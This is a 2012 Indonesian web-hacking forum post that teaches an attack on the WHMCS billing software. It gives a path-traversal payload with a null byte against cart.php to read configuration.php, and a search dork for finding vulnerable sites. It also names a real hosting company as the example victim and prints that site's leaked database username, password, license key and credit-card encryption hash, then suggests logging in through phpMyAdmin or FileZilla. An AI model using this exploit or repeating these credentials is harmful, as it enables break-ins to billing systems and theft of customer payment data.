X-code Professional

X-code Community

Facebook group

Instagram X-code

Twitter

X-code Training

Panel
Welcome! Anonymous

Hack WHMCS

[ { NUM_COMMENT }]

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya

Hack WHMCS

Postby djrhiby » Sun Feb 26, 2012 8:18 pm

:roll: salam kenal neh gan mungkin ini baru pertama kali saya share ya kali ini saya mau share tentang
Hack WHMCS ??? waduuhh emang nya gimana ya :lol: di dunia ini tidak ada security yang 100% menurut saya ya gan :geek: totur ini juga butuh kesabaran :roll: jadi jangan terlalu nafsu ya gan :lol: ok deh kita ke take point aja ya
semoga gak repost ini
Exploiti Powered by whmcs
/cart.php?a=
cart.php?a=test&templatefile=../../../configuration.php%00


untuk dork nya saya biasa memakai ini gan
inurl:whmcs/cart.php?a=

mungkin dork bisa dengan imajinasi kalian :lol:
untuk korban saya saya kasih deh buat pembelajaran saja
Code: Select all
https://www.600host.net/billing/cart.php


tambahkan aja belakang cart.php ganti dengan exploit ini
Code: Select all
cart.php?a=test&templatefile=../../../configuration.php%00

ntar hasil nya akan begini gan
Code: Select all
https://www.600host.net/billing/cart.php?a=test&templatefile=../../../configuration.php

kalau sudah enter tampilan akan kosong
contoh gambar
Image

nah kalau sudah kita tekan CTRL+U kita lihat di bagian ini
Image

code di bagian ini
Code: Select all
<?php
$license="c82f91de790f";
$db_host = "localhost";
$db_username = "host_whmcs";
$db_password = "}|jkxpHl-pU6";
$db_name = "host_whmcs";
$cc_encryption_hash = "gyD5g3OMqdMlszfhWiKAjzwxTQByVNu1bYWhRBT8FwkXVp5IyF9H5w4OcwdX9xPa";
$templates_compiledir = "templates_c/";
$display_errors=true;
?>


taraaa kita berhasil mendapatkan database :lol:
selanjut nya bisa kita menggunakan phpmyadmin / filezilla
semoga totur ini bermanfaat

rhiby_gokil@yahoo.com
Image
djrhiby
 
Posts: 20
Joined: Thu Feb 23, 2012 8:23 pm

{ FACEBOOK_COMMENT }

Return to Web Hacking

Who is online

Users browsing this forum: No registered users and 10 guests